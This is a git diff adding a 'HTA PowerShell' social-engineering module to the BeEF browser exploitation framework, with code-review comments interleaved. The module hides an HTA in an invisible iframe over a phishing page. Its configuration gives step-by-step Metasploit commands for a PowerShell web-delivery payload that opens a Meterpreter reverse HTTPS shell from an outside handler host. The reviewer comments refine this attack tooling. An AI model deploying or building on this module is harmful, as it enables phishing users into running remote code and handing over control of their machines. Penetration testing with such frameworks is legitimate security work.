diff --git a/modules/social_engineering/hta_powershell/command.js b/modules/social_engineering/hta_powershell/command.js
new file mode 100755
index 000000000..b809124bd
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var hta_url = '<%= @domain %>' + '<%= @mount_point %>';
+
+ if(beef.browser.isIE()){
+ // application='yes' is IE-only and needed to load the HTA into an IFrame.
+ // in this way you can have your phishing page, and load the HTA on top of it
+ beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
+ }
+});
diff --git a/modules/social_engineering/hta_powershell/config.yaml b/modules/social_engineering/hta_powershell/config.yaml
new file mode 100755
index 000000000..bc1875c07
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ hta_powershell:
+ enable: true
+ category: ["Social Engineering"]
+ name: "HTA PowerShell"
+ description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.
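Review bot: The result string on the `beef.net.send` line, `'HTA loaded into hidden IFrame.'`, is sent straight after `beef.dom.createIframe` returns, when all this script knows is that an iframe element was appended; whether the request for the HTA succeeded or the user consented is not observable here, so the console result overstates what happened. A wording such as `'HTA IFrame appended to DOM; execution depends on user consent.'` keeps the reported status honest. The non-IE path sends nothing, so on other browsers the command never reports back even though config.yaml already declares it IE-only; an `else` branch with `beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Browser is not IE; HTA IFrame not created.');` would close the command out. The `@domain` and `@mount_point` values are also concatenated into single-quoted JS literals without escaping, so a `'` in either option breaks the generated script; emitting them via a JSON-encoding helper, if the template layer provides one, avoids that.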
If the user allows execution, powershell is used to download the payload from a Metasploit handler and execute it.
Before launching the module, do the following on Metasploit:
use exploit/windows/misc/psh_web_delivery
set URIPATH /psh
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z"
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["IE"]
+ not_working: ["ALL"]
diff --git a/modules/social_engineering/hta_powershell/module.rb b/modules/social_engineering/hta_powershell/module.rb
new file mode 100755
index 000000000..237848fcf
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/module.rb
@@ -0,0 +1,58 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Hta_powershell < BeEF::Core::Command
+
+ class Bind_hta < BeEF::Core::Router::Router
+ before do
+ headers 'Content-Type' => 'application/hta',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ get '/' do
+ response['Content-Type'] = "application/hta"
+ payload_handler = settings.payload_handler
+ print_info "Serving HTA. Payload handler: #{payload_handler}"
+ ""
+ end
+ end
+
+ def pre_send
+
+ # gets the value configured in the module configuration by the user
+ @datastore.each do |input|
+ if input['name'] == "payload_handler"
+ @payload_handler = input['value']
+ end
+ if input['name'] == "mount_point"
+ @mount_point = input['value']
+ end
+ end
+
+ # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+ bind_hta = Hta_powershell::Bind_hta
+ bind_hta.set :payload_handler, @payload_handler
+ BeEF::Core::Server.instance.mount(@mount_point, bind_hta.new)
+ BeEF::Core::Server.instance.remap
+ end
+
+ def self.options
+ return [
+ {'name' => 'payload_handler', 'ui_label'=>'Payload Handler', 'value' =>'http://10.10.10.10:8080/psh'},
+ {'name' => 'mount_point', 'ui_label'=>'Mount point', 'value' =>'/hta'},
+ {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beef_domain.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
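Review bot: `bind_hta.set :payload_handler, @payload_handler` in `pre_send` stores the option as a class-level setting on the shared `Bind_hta` class (the `settings`/`before` usage suggests a Sinatra-style router), and `mount`/`remap` run unconditionally on every send, so two sends with different handlers or mount points overwrite each other's setting while the earlier route stays registered; whether `BeEF::Core::Server#mount` rejects duplicates is not visible here. Capturing the value per instance (pass it into `bind_hta.new` via an initializer) and skipping the mount when `@mount_point` is already bound would make repeated sends predictable, and `@mount_point` should be checked for a leading `/` before it reaches `mount`, since `self.options` only supplies a default. `response['Content-Type'] = "application/hta"` in the `get '/'` block repeats what the `before` filter already sets and can be dropped. The comment above the mount should read `specific content-type/disposition` (typo `specifi`).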